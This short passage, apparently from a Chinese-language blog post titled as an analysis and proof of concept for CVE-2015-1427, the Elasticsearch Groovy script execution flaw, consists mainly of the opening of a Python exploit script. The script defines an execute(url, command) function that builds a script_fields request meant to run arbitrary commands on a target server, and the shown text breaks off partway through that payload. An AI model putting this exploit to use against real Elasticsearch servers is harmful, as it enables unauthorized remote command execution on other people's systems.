Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427) [code lang="python" start="" highlight=""] #!/usr/bin/env python import urllib import urllib2 import json import sys def execute(url,command): parameters = {"size":1, "script_fields": {"iswin": {"script":"java…